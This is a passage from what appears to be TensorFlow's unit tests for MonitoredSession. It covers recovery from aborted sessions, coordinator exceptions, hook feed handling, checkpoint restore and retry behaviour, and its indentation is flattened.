AbortAtNSession(sess, x + 1) for x in range(3)
]
def create_session(self):
return self.sessions_to_use.pop(0)
c = constant_op.constant(0)
v = array_ops.identity(c)
session_creator = StackSessionCreator(sess)
# List of 3 sessions to use for recovery. The first one aborts
# after 1 run() call, the second after 2 run calls, the third
# after 3 run calls.
self.assertEqual(3, len(session_creator.sessions_to_use))
      # Make the recoverable session use these 3 sessions in sequence by
      # passing a factory that pops from the sessions_to_use list.
recoverable_sess = monitored_session._RecoverableSession(session_creator)
self.assertEqual(
2, len(session_creator.sessions_to_use)) # One session popped.
# Using first session.
self.assertEqual(51, recoverable_sess.run(v, feed_dict={c: 51}))
self.assertEqual(
2, len(session_creator.sessions_to_use)) # Still 2 sessions available
# This will fail and recover by picking up the second session.
self.assertEqual(42, recoverable_sess.run(v, feed_dict={c: 42}))
self.assertEqual(
1, len(session_creator.sessions_to_use)) # Still 1 session available
self.assertEqual(33, recoverable_sess.run(v, feed_dict={c: 33}))
self.assertEqual(
1, len(session_creator.sessions_to_use)) # Still 1 session available
# This will fail and recover by picking up the last session.
self.assertEqual(24, recoverable_sess.run(v, feed_dict={c: 24}))
self.assertEqual(
0, len(session_creator.sessions_to_use)) # All sessions used.
self.assertEqual(11, recoverable_sess.run(v, feed_dict={c: 11}))
self.assertEqual(0, recoverable_sess.run(v, feed_dict={c: 0}))
# This will fail and throw a real error as the pop() will fail.
with self.assertRaisesRegex(IndexError, 'pop from empty list'):
recoverable_sess.run(v, feed_dict={c: -12})
@test_util.run_deprecated_v1
def test_recovery_from_coordinator_exception(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
session = monitored_session.MonitoredSession(
session_creator,
[StopCoordinatorWithException(calls_before_stopping=2)])
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
# The coordinator will not abort during this call, since it's the call
# number 0.
self.assertEqual(51, session.run(v, feed_dict={c: 51}))
self.assertFalse(session.should_stop())
# The coordinator will abort during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run(v, feed_dict={c: 42}))
# Even though the coordinator was asked to stop, the underlying session is
# recreated and is to be continued.
self.assertFalse(session.should_stop())
self.assertEqual(2, session_creator.number_of_sessions_created)
@test_util.run_deprecated_v1
def test_recovery_from_non_preemption_in_coordinator(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
hook = StopCoordinatorWithException(
calls_before_stopping=2,
exception_to_raise=errors_impl.UnknownError(
None, None, 'Some fatal exception inside the coordinator.'))
session = monitored_session.MonitoredSession(session_creator, [hook])
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
# The coordinator will not abort during this call, since it's the call
# number 0.
self.assertEqual(51, session.run(v, feed_dict={c: 51}))
self.assertFalse(session.should_stop())
# The coordinator will abort during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run(v, feed_dict={c: 42}))
# The coordinator was asked to stop due to non-redeemable error. Training
# should stop and the session should not be recreated.
self.assertTrue(session.should_stop())
self.assertEqual(1, session_creator.number_of_sessions_created)
with self.assertRaises(errors_impl.UnknownError):
session.close()
@test_util.run_deprecated_v1
def test_recovery_from_session_getting_stuck(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
session = monitored_session.MonitoredSession(
session_creator,
[FailTrainingAfterCoordinatorStopped(calls_before_stopping=2)])
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
# Training will not fail, since it's the call number 0.
self.assertEqual(51, session.run(v, feed_dict={c: 51}))
self.assertFalse(session.should_stop())
# Training will fail during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run(v, feed_dict={c: 42}))
      # Even though the coordinator stopped and training failed, the
# underlying session is recreated and training is to be continued.
self.assertFalse(session.should_stop())
self.assertEqual(2, session_creator.number_of_sessions_created)
@test_util.run_deprecated_v1
def test_step_fn_recovery_from_coordinator_exception_when_run_hooks(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
session = monitored_session.MonitoredSession(
session_creator,
[StopCoordinatorWithException(calls_before_stopping=2)])
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
def feed_step_fn(value):
def step_fn(step_context):
return step_context.run_with_hooks(fetches=v, feed_dict={c: value})
return step_fn
# The coordinator will not abort during this call, since it's the call
# number 0.
self.assertEqual(51, session.run_step_fn(feed_step_fn(51)))
self.assertFalse(session.should_stop())
# The coordinator will abort during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run_step_fn(feed_step_fn(42)))
# Even though the coordinator was asked to stop, the underlying session is
# recreated and is to be continued.
self.assertFalse(session.should_stop())
self.assertEqual(2, session_creator.number_of_sessions_created)
@test_util.run_deprecated_v1
def test_recovery_from_non_preemption_in_coordinator_when_run_hooks(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
hook = StopCoordinatorWithException(
calls_before_stopping=2,
exception_to_raise=errors_impl.UnknownError(
None, None, 'Some fatal exception inside the coordinator.'))
session = monitored_session.MonitoredSession(session_creator, [hook])
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
def feed_step_fn(value):
def step_fn(step_context):
return step_context.run_with_hooks(fetches=v, feed_dict={c: value})
return step_fn
# The coordinator will not abort during this call, since it's the call
# number 0.
self.assertEqual(51, session.run_step_fn(feed_step_fn(51)))
self.assertFalse(session.should_stop())
# The coordinator will abort during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run_step_fn(feed_step_fn(42)))
# The coordinator was asked to stop due to non-redeemable error. Training
# should stop and the session should not be recreated.
self.assertTrue(session.should_stop())
self.assertEqual(1, session_creator.number_of_sessions_created)
with self.assertRaises(errors_impl.UnknownError):
session.close()
@test_util.run_deprecated_v1
def test_recovery_from_session_getting_stuck_when_run_hooks(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
session = monitored_session.MonitoredSession(
session_creator,
[FailTrainingAfterCoordinatorStopped(calls_before_stopping=2)])
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
def feed_step_fn(value):
def step_fn(step_context):
return step_context.run_with_hooks(fetches=v, feed_dict={c: value})
return step_fn
# Training will not fail, since it's the call number 0.
self.assertEqual(51, session.run_step_fn(feed_step_fn(51)))
self.assertFalse(session.should_stop())
# Training will fail during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run_step_fn(feed_step_fn(42)))
      # Even though the coordinator stopped and training failed, the
# underlying session is recreated and training is to be continued.
self.assertFalse(session.should_stop())
self.assertEqual(2, session_creator.number_of_sessions_created)
def create_raw_session_with_failing_coordinator(self, session_creator, hook):
"""Return MonitoredSession that triggers coordinator failures."""
session = monitored_session.MonitoredSession(session_creator, [hook])
# We would like to test a situation where during fetches through the
# raw session, the coordinator fails with an exception. To do that, we
# are going to use (raw_session + StopCoordinatorWithException) hook
# combination that is stored in
# `MonitoredSession._RecoverableSession._CoordinatedSession._sess`
# at this point:
session._tf_sess = lambda: session._sess._sess._sess
# `run()` on such a session is equivalent to `run()` on the raw session
# with separate coordinator threads independently stopping with an
# exception.
return session
@test_util.run_deprecated_v1
def test_step_fn_recovery_from_coordinator_exception_with_raw_session(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
session = self.create_raw_session_with_failing_coordinator(
session_creator,
StopCoordinatorWithException(calls_before_stopping=2))
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
def feed_step_fn(value):
def step_fn(step_context):
return step_context.session.run(fetches=v, feed_dict={c: value})
return step_fn
# The coordinator will not abort during this call, since it's the call
# number 0.
self.assertEqual(51, session.run_step_fn(feed_step_fn(51)))
self.assertFalse(session.should_stop())
# The coordinator will abort during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run_step_fn(feed_step_fn(42)))
# Even though the coordinator was asked to stop, the underlying session is
# recreated and is to be continued.
self.assertFalse(session.should_stop())
self.assertEqual(2, session_creator.number_of_sessions_created)
@test_util.run_deprecated_v1
def test_recovery_from_non_preemption_in_coordinator_with_raw_session(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
session = self.create_raw_session_with_failing_coordinator(
session_creator,
StopCoordinatorWithException(
calls_before_stopping=2,
exception_to_raise=errors_impl.UnknownError(
None, None, 'Some fatal exception inside the coordinator.')))
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
def feed_step_fn(value):
def step_fn(step_context):
return step_context.run_with_hooks(fetches=v, feed_dict={c: value})
return step_fn
# The coordinator will not abort during this call, since it's the call
# number 0.
self.assertEqual(51, session.run_step_fn(feed_step_fn(51)))
self.assertFalse(session.should_stop())
# The coordinator will abort during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run_step_fn(feed_step_fn(42)))
# The coordinator was asked to stop due to non-redeemable error. Training
# should stop and the session should not be recreated.
self.assertTrue(session.should_stop())
self.assertEqual(1, session_creator.number_of_sessions_created)
with self.assertRaises(errors_impl.UnknownError):
session.close()
@test_util.run_deprecated_v1
def test_recovery_from_session_getting_stuck_with_raw_session(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
session = self.create_raw_session_with_failing_coordinator(
session_creator,
FailTrainingAfterCoordinatorStopped(calls_before_stopping=2))
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
def feed_step_fn(value):
def step_fn(step_context):
return step_context.run_with_hooks(fetches=v, feed_dict={c: value})
return step_fn
# Training will not fail, since it's the call number 0.
self.assertEqual(51, session.run_step_fn(feed_step_fn(51)))
self.assertFalse(session.should_stop())
# Training will fail during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run_step_fn(feed_step_fn(42)))
      # Even though the coordinator stopped and training failed, the
# underlying session is recreated and training is to be continued.
self.assertFalse(session.should_stop())
self.assertEqual(2, session_creator.number_of_sessions_created)
class FakeSession(monitored_session._WrappedSession):
def __init__(self, sess):
monitored_session._WrappedSession.__init__(self, sess)
self.args_called = {}
def run(self, fetches, **kwargs):
self.args_called = dict(kwargs)
# Call run only with fetches since we directly pass other arguments.
return monitored_session._WrappedSession.run(self, fetches)
class HookedSessionTest(test.TestCase):
"""Tests of _HookedSession."""
def testRunPassesAllArguments(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_run = FakeSession(sess)
mon_sess = monitored_session._HookedSession(sess=mock_run, hooks=[])
a_tensor = constant_op.constant([0], name='a_tensor')
self.evaluate(variables.global_variables_initializer())
output = mon_sess.run(fetches=a_tensor,
feed_dict='a_feed',
options='an_option',
run_metadata='a_metadata')
self.assertEqual(output, [0])
self.assertEqual(mock_run.args_called, {
'feed_dict': 'a_feed',
'options': 'an_option',
'run_metadata': 'a_metadata'
})
def testCallsHooksBeginEnd(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
self.evaluate(variables.global_variables_initializer())
mon_sess.run(a_tensor)
for hook in [mock_hook, mock_hook2]:
self.assertEqual(
hook.last_run_values,
session_run_hook.SessionRunValues(
results=None,
options=config_pb2.RunOptions(),
run_metadata=config_pb2.RunMetadata()))
self.assertEqual(hook.last_run_context.original_args,
session_run_hook.SessionRunArgs(a_tensor))
self.assertEqual(hook.last_run_context.session, sess)
self.assertEqual(hook.call_counter['begin'], 0)
self.assertEqual(hook.call_counter['after_create_session'], 0)
self.assertEqual(hook.call_counter['before_run'], 1)
self.assertEqual(hook.call_counter['after_run'], 1)
def testShouldStop(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
constant_op.constant([0], name='a_tensor')
self.evaluate(variables.global_variables_initializer())
mon_sess.run(fetches='a_tensor')
self.assertFalse(mon_sess.should_stop())
mock_hook.should_stop = True
mon_sess.run(fetches='a_tensor')
self.assertTrue(mon_sess.should_stop())
def testFetchesHookRequests(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
another_tensor = constant_op.constant([5], name='another_tensor')
third_tensor = constant_op.constant([10], name='third_tensor')
mock_hook.request = session_run_hook.SessionRunArgs([another_tensor])
mock_hook2.request = session_run_hook.SessionRunArgs([third_tensor])
self.evaluate(variables.global_variables_initializer())
output = mon_sess.run(fetches=a_tensor)
self.assertEqual(output, [0])
self.assertEqual(mock_hook.last_run_values.results, [5])
self.assertEqual(mock_hook2.last_run_values.results, [10])
def testOnlyHooksHaveFeeds(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
b_tensor = constant_op.constant([0], name='b_tensor')
add_tensor = a_tensor + b_tensor
mock_hook.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [5]})
mock_hook2.request = session_run_hook.SessionRunArgs(
None, feed_dict={b_tensor: [10]})
self.evaluate(variables.global_variables_initializer())
self.assertEqual(mon_sess.run(fetches=add_tensor), [15])
def testBothHooksAndUserHaveFeeds(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
b_tensor = constant_op.constant([0], name='b_tensor')
c_tensor = constant_op.constant([0], name='c_tensor')
add_tensor = a_tensor + b_tensor + c_tensor
mock_hook.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [5]})
mock_hook2.request = session_run_hook.SessionRunArgs(
None, feed_dict={b_tensor: [10]})
self.evaluate(variables.global_variables_initializer())
feed_dict = {c_tensor: [20]}
self.assertEqual(
mon_sess.run(fetches=add_tensor, feed_dict=feed_dict), [35])
# User feed_dict should not be changed
self.assertEqual(len(feed_dict), 1)
def testHooksFeedConflicts(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
b_tensor = constant_op.constant([0], name='b_tensor')
add_tensor = a_tensor + b_tensor
mock_hook.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [5]})
mock_hook2.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [10]})
self.evaluate(variables.global_variables_initializer())
with self.assertRaisesRegex(RuntimeError, 'Same tensor is fed'):
mon_sess.run(fetches=add_tensor)
def testHooksAndUserFeedConflicts(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
b_tensor = constant_op.constant([0], name='b_tensor')
add_tensor = a_tensor + b_tensor
mock_hook.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [5]})
mock_hook2.request = session_run_hook.SessionRunArgs(
None, feed_dict={b_tensor: [10]})
self.evaluate(variables.global_variables_initializer())
with self.assertRaisesRegex(RuntimeError, 'Same tensor is fed'):
mon_sess.run(fetches=add_tensor, feed_dict={b_tensor: [10]})
class RaiseOnceAtCountN(session_run_hook.SessionRunHook):
"""Hook that raises an Exception at step N."""
def __init__(self, n, ex):
self.n = n
self.ex = ex
self.raised = False
def before_run(self, run_context):
# Raise the first time we reach step N.
self.n -= 1
if 0 == self.n and not self.raised:
self.raised = True
raise self.ex
return None
class RunOptionsMetadataHook(session_run_hook.SessionRunHook):
"""A hook that observes & optionally modifies RunOptions and RunMetadata."""
def __init__(self, trace_level, timeout_in_ms, output_partition_graphs,
debug_tensor_watch, report_tensor_allocations_upon_oom):
self._trace_level = trace_level
self._timeout_in_ms = timeout_in_ms
self._output_partition_graphs = output_partition_graphs
self._debug_tensor_watch = debug_tensor_watch
self._report_tensor_allocations_upon_oom = (
report_tensor_allocations_upon_oom)
self.run_options_list = []
self.run_metadata_list = []
def before_run(self, run_context):
options = config_pb2.RunOptions(
trace_level=self._trace_level,
timeout_in_ms=self._timeout_in_ms,
output_partition_graphs=self._output_partition_graphs,
report_tensor_allocations_upon_oom=self
._report_tensor_allocations_upon_oom)
options.debug_options.debug_tensor_watch_opts.extend(
[self._debug_tensor_watch])
return session_run_hook.SessionRunArgs(None, None, options=options)
def after_run(self, run_context, run_values):
self.run_options_list.append(run_values.options)
self.run_metadata_list.append(run_values.run_metadata)
class MonitoredSessionTest(test.TestCase):
"""MonitoredSession tests."""
def test_defaults(self):
with ops.Graph().as_default():
a_var = variables.VariableV1(0)
with monitored_session.MonitoredSession() as session:
self.assertEqual(0, session.run(a_var))
def test_last_step(self):
logdir = _test_dir(self.get_temp_dir(), 'test_last_step')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
# Run till step 3 and save.
hooks = [basic_session_run_hooks.StopAtStepHook(last_step=3)]
with monitored_session.MonitoredSession(hooks=hooks) as session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
self.assertEqual(1, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertEqual(3, session.run(do_step))
self.assertTrue(session.should_stop())
save_path = saver_lib._get_saver_or_default().save(
session._coordinated_creator.tf_sess,
os.path.join(logdir, 'step-3'))
      # Restore and run till step 5.
def load_ckpt(scaffold, sess):
scaffold.saver.restore(sess, save_path)
session_creator = monitored_session.ChiefSessionCreator(
monitored_session.Scaffold(init_fn=load_ckpt))
hooks = [basic_session_run_hooks.StopAtStepHook(last_step=5)]
with monitored_session.MonitoredSession(
hooks=hooks, session_creator=session_creator) as session:
self.assertEqual(3, session.run(gstep))
self.assertFalse(session.should_stop())
self.assertEqual(4, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertEqual(5, session.run(do_step))
self.assertTrue(session.should_stop())
def test_num_steps(self):
logdir = _test_dir(self.get_temp_dir(), 'test_num_steps')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
# Do 3 steps and save.
hooks = [basic_session_run_hooks.StopAtStepHook(num_steps=3)]
with monitored_session.MonitoredSession(hooks=hooks) as session:
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertTrue(session.should_stop())
save_path = saver_lib._get_saver_or_default().save(
session._coordinated_creator.tf_sess,
os.path.join(logdir, 'step-3'))
# Restore and do 4 steps.
def load_ckpt(scaffold, sess):
scaffold.saver.restore(sess, save_path)
session_creator = monitored_session.ChiefSessionCreator(
scaffold=monitored_session.Scaffold(init_fn=load_ckpt))
hooks = [basic_session_run_hooks.StopAtStepHook(num_steps=4)]
with monitored_session.MonitoredSession(
hooks=hooks, session_creator=session_creator) as session:
self.assertEqual(4, session.run(do_step))
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertTrue(session.should_stop())
  # This set of tests verifies the supervised session behavior when exceptions
# are raised next to the innermost session run() call.
@test_util.run_deprecated_v1
def test_recovery(self):
logdir = _test_dir(self.get_temp_dir(), 'test_recovery')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
scaffold = monitored_session.Scaffold()
      # Use a hook to save the model after every step. It also saves it at
# the end.
hooks = [
basic_session_run_hooks.CheckpointSaverHook(
logdir, save_steps=1, scaffold=scaffold)
]
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold, checkpoint_dir=logdir),
hooks=hooks) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold, checkpoint_dir=logdir)) as session:
self.assertEqual(2, session.run(gstep))
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold,
checkpoint_filename_with_path=checkpoint_management.
latest_checkpoint(logdir))) as session:
self.assertEqual(2, session.run(gstep))
def test_retry_initialization_on_aborted_error(self):
# Tests that we silently retry on abort during initialization.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
self.init_raised_aborted_error = False
def _init_fn(scaffold, session):
_, _ = scaffold, session
if not self.init_raised_aborted_error:
self.init_raised_aborted_error = True
raise errors_impl.AbortedError(None, None, 'Abort')
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold=monitored_session.Scaffold(
init_fn=_init_fn))) as session:
self.assertFalse(session.should_stop())
self.assertEqual(0, session.run(gstep))
self.assertTrue(self.init_raised_aborted_error)
def _retry_test(self, ex):
# Tests that we silently retry on error. Note that this does not test
# recovery as we do not use a CheckpointSaver in this test.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(4, ex)
with monitored_session.MonitoredSession(hooks=[hook]) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Here at step 3, the hook triggers and raises AbortedError. The
        # MonitoredSession automatically retries and restarts from a freshly
# initialized session, so the step is back to 0 and running do_step
# moves it to 1.
self.assertEqual(1, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertTrue(hook.raised)
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
def test_retry_on_aborted_error(self):
self._retry_test(errors_impl.AbortedError(None, None, 'Abort'))
def test_retry_on_unavailable_error(self):
self._retry_test(errors_impl.UnavailableError(None, None, 'Unavailable'))
def test_recover_and_retry_on_aborted_error(self):
# Tests that we silently retry and recover on abort. This test uses
# a CheckpointSaver to have something to recover from.
logdir = _test_dir(self.get_temp_dir(),
'test_recover_and_retry_on_aborted_error')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
scaffold = monitored_session.Scaffold()
abort_hook = RaiseOnceAtCountN(
4, errors_impl.AbortedError(None, None, 'Abort'))
# Save after each step.
ckpt_hook = basic_session_run_hooks.CheckpointSaverHook(
logdir, save_steps=1, scaffold=scaffold)
hooks = [abort_hook, ckpt_hook]
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold, checkpoint_dir=logdir),
hooks=hooks) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Here at step 3, the hook triggers and raises AbortedError. The
# MonitoredSession automatically restores and retries.
self.assertEqual(3, session.run(do_step))
self.assertTrue(abort_hook.raised)
self.assertFalse(session.should_stop())
self.assertEqual(4, session.run(do_step))
self.assertFalse(session.should_stop())
def test_exit_cleanly_on_out_of_range_exception(self):
# Tests that we stop cleanly when OutOfRange is raised.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(2, errors_impl.OutOfRangeError(None, None,
'EOI'))
session = monitored_session.MonitoredSession(hooks=[hook])
# session should cleanly exit from the context.
with session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
# Here at step 1, the hook triggers and raises OutOfRange. The
# session should go into should_stop() mode. It should raise the
# exception. So next step should not be executed.
session.run(do_step)
self.assertTrue(False)
self.assertTrue(session.should_stop())
def test_exit_cleanly_on_stop_iteration_exception(self):
# Tests that we stop cleanly when OutOfRange is raised.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(2, StopIteration)
session = monitored_session.MonitoredSession(hooks=[hook])
# session should cleanly exit from the context.
with session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
# Here at step 1, the hook triggers and raises StopIteration. The
# session should go into should_stop() mode. It should raise the
# exception. So next step should not be executed.
session.run(do_step)
self.assertTrue(False)
self.assertTrue(session.should_stop())
def test_regular_exception_pass_through_run(self):
# Tests that regular exceptions just pass through a "with
# MonitoredSession" block and set the session in stop mode.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(4, RuntimeError('regular exception'))
session = monitored_session.MonitoredSession(hooks=[hook])
with self.assertRaisesRegex(RuntimeError, 'regular exception'):
with session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# This triggers the hook and raises the exception
session.run(do_step)
# We should not hit this
self.assertFalse(True)
self.assertTrue(hook.raised)
self.assertTrue(session.should_stop())
def test_regular_exception_reported_to_coord_pass_through_run(self):
# Tests that regular exceptions reported to the coordinator from a thread
# passes through a "run()" call within a "with MonitoredSession" block and
# set the session in stop mode.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
session = monitored_session.MonitoredSession()
run_performed_without_error = False
with self.assertRaisesRegex(RuntimeError, 'a thread wants to stop'):
with session:
self.assertEqual(0, session.run(gstep))
# Report an exception through the coordinator.
try:
raise RuntimeError('a thread wants to stop')
except RuntimeError as e:
session._coordinated_creator.coord.request_stop(e)
# Call run() which should perform normally.
self.assertEqual(0, session.run(gstep))
run_performed_without_error = True
self.assertTrue(run_performed_without_error)
def test_regular_exception_reported_to_coord_pass_through_return(self):
# Tests that regular exceptions reported to the coordinator from a thread
    # pass through returning from a "with MonitoredSession" block and
# set the session in stop mode.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
session = monitored_session.MonitoredSession()
with self.assertRaisesRegex(RuntimeError, 'a thread wants to stop'):
with session:
self.assertEqual(0, session.run(gstep))
# Report an exception through the coordinator.
try:
raise RuntimeError('a thread wants to stop')
except RuntimeError as e:
session._coordinated_creator.coord.request_stop(e)
self.assertTrue(session.should_stop())
  # This set of tests verifies the session behavior when exceptions are raised
# from code inside a "with MonitoredSession:" context.
def test_stop_cleanly_when_no_exception_in_with_body(self):
    # Tests that the session closes cleanly when no exception is raised.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
session = monitored_session.MonitoredSession()
with session:
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Should have closed.
self.assertTrue(session.should_stop())
self.assertTrue(session._is_closed())
def test_raises_regular_exceptions_in_with_body(self):
# Tests that regular exceptions in "with body" are seen outside.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
session = monitored_session.MonitoredSession()
# We should see that exception.
with self.assertRaisesRegex(RuntimeError, 'regular exception'):
with session:
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Will be visible outside the "with body".
raise RuntimeError('regular exception')
# Should have closed.
self.assertTrue(session.should_stop())
self.assertTrue(session._is_closed())
def test_graph(self):
with ops.Graph().as_default() as g:
with monitored_session.MonitoredSession() as session:
self.assertEqual(g, session.graph)
def test_graph_finalized_during_run_unfinalized_after_exit(self):
with ops.Graph().as_default() as g:
a_var = variables.VariableV1(0)
with monitored_session.MonitoredSession() as session:
self.assertEqual(0, session.run(a_var))
self.assertTrue(g.finalized)
self.assertFalse(g.finalized)
def test_keep_finalized_graph_as_finalized(self):
with ops.Graph().as_default() as g:
a_var = variables.VariableV1(0)
monitored_session.Scaffold().finalize()
with monitored_session.MonitoredSession() as session:
self.assertEqual(0, session.run(a_var))
self.assertTrue(g.finalized)
self.assertTrue(g.finalized)
def test_merge_run_options_from_hooks(self):
"""Test for rewriting RunOptions and observing RunMetadata with hooks."""
with ops.Graph().as_default():
my_const = constant_op.constant(42, name='my_const')
_ = constant_op.constant(24, name='my_const_2')
watch_a = debug_pb2.DebugTensorWatch(
node_name='my_const',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
hook_a = RunOptionsMetadataHook(2, 30000, False, watch_a, False)
watch_b = debug_pb2.DebugTensorWatch(
node_name='my_const_2',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
hook_b = RunOptionsMetadataHook(3, 60000, True, watch_b, True)
with monitored_session.MonitoredSession(
hooks=[hook_a, hook_b]) as session:
self.assertEqual(42, session.run(my_const))
# trace_level=3 should have overridden trace_level=2;
# timeout_in_ms=60000 should have overridden 30000;
# output_partition_graphs=True should have overridden False.
# The two debug tensor watches should have been merged.
self.assertEqual([
